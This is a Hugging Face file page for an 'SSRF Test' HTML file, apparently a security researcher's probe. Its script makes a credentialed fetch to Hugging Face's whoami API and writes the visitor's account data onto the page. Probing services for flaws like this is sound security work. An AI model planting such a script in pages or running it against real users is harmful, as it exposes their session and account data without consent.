test-static-sec / index.html
hackeronetestt's picture
initial
92ec9bd verified
Raw
History Blame Contribute Delete
200 Bytes
<html><body><h1>SSRF Test</h1><script>fetch("https://huggingface.co/api/whoami-v2",{credentials:"include"}).then(r=>r.json()).then(d=>document.body.innerHTML+=JSON.stringify(d))</script></body></html>